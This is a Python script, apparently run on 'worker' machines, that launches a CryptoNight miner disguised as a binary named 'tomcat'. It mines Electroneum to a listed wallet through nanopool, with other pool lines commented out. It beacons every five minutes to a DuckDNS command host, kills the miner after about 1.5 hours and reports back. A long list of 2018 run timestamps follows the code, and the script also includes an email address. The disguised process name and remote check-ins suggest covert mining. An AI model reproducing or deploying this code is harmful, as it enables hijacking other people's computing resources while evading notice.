import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:43:01.586390
#2018-02-17 17:31:07.576626
#2018-02-17 19:19:05.090733
#2018-02-17 21:08:07.268175
#2018-02-17 22:52:01.790636
#2018-02-18 00:37:04.917186
#2018-02-18 02:27:06.533642
#2018-02-18 04:14:06.159142
#2018-02-18 06:04:01.902726
#2018-02-18 07:53:06.020799
#2018-02-18 09:40:08.692686
#2018-02-18 11:26:03.442338
#2018-02-18 13:12:05.502820
#2018-02-18 15:01:05.520554
#2018-02-18 16:49:07.182226
#2018-02-18 18:37:06.170304
#2018-02-18 20:25:01.496693
#2018-02-18 22:11:01.522636
#2018-02-18 23:59:01.806814
#2018-02-19 01:45:08.792086
#2018-02-19 03:32:01.511029
#2018-02-19 05:16:06.578052
#2018-02-19 07:03:03.692603
#2018-02-19 08:52:06.353447
#2018-02-19 10:41:02.058788
#2018-02-19 12:27:08.050705
#2018-02-19 14:14:01.864609
#2018-02-19 16:03:06.540349
#2018-02-19 17:51:06.439297
#2018-02-19 19:39:05.871330
#2018-02-19 21:26:01.749027
#2018-02-19 23:12:01.531013
#2018-02-20 00:57:03.716654
#2018-02-20 02:48:07.218121
#2018-02-20 04:37:04.214728
#2018-02-20 06:21:01.427520
#2018-02-20 08:06:05.802868
#2018-02-20 09:51:08.927685
#2018-02-20 11:35:01.783976
#2018-02-20 13:21:05.077364
#2018-02-20 15:06:06.350906
#2018-02-20 16:50:06.393982
#2018-02-20 18:38:06.351059
#2018-02-20 20:31:05.056792
#2018-02-20 22:16:04.343670
#2018-02-20 23:57:06.860358
#2018-02-21 01:42:04.993094
#2018-02-21 03:30:05.011416
#2018-02-21 05:18:06.542935
#2018-02-21 07:06:01.216236
#2018-02-21 08:51:04.350393
#2018-02-21 10:39:07.432809
#2018-02-21 12:27:02.002583
#2018-02-21 14:13:08.174394
#2018-02-21 16:02:02.045596
#2018-02-21 17:53:07.013747
#2018-02-21 19:38:08.863309
#2018-02-21 21:25:05.264020
#2018-02-21 23:11:07.122908
#2018-02-22 01:01:07.535070
#2018-02-22 02:50:09.002986
#2018-02-22 04:37:01.483808
#2018-02-22 06:21:07.244788
#2018-02-22 08:08:05.811723
#2018-02-22 09:56:04.478184
#2018-02-22 11:41:01.500313
#2018-02-22 13:27:08.142129
#2018-02-22 15:16:02.006339
#2018-02-22 17:01:06.119630
#2018-02-22 18:48:02.009154
#2018-02-22 20:39:06.492627
#2018-02-22 22:24:07.097569
#2018-02-23 00:10:08.112080
#2018-02-23 01:58:08.312857
#2018-02-23 03:46:05.212692
#2018-02-23 05:35:07.789178
#2018-02-23 07:20:01.767626
#2018-02-23 09:24:01.822693
#2018-02-23 11:29:05.716731
#2018-02-23 13:20:08.804130
#2018-02-23 15:06:04.420753
#2018-02-23 16:54:03.862276
#2018-02-23 18:43:06.207456
#2018-02-23 20:29:04.478134
#2018-02-23 22:16:01.863823
#2018-02-24 00:01:08.529270
#2018-02-24 01:53:01.320837
#2018-02-24 03:43:06.192422
#2018-02-24 05:31:03.704318
#2018-02-24 07:16:07.365192
#2018-02-24 09:05:06.715787
#2018-02-24 10:44:05.989813
#2018-02-24 12:27:01.956606
#2018-02-24 14:04:03.868115
#2018-02-24 15:43:01.652292
#2018-02-24 17:20:07.601695
#2018-02-24 18:52:07.378798
#2018-02-24 20:23:03.947292
#2018-02-24 21:52:05.265364
#2018-02-25 00:35:01.567923
#2018-02-25 04:02:06.631362
#2018-02-25 07:34:06.766182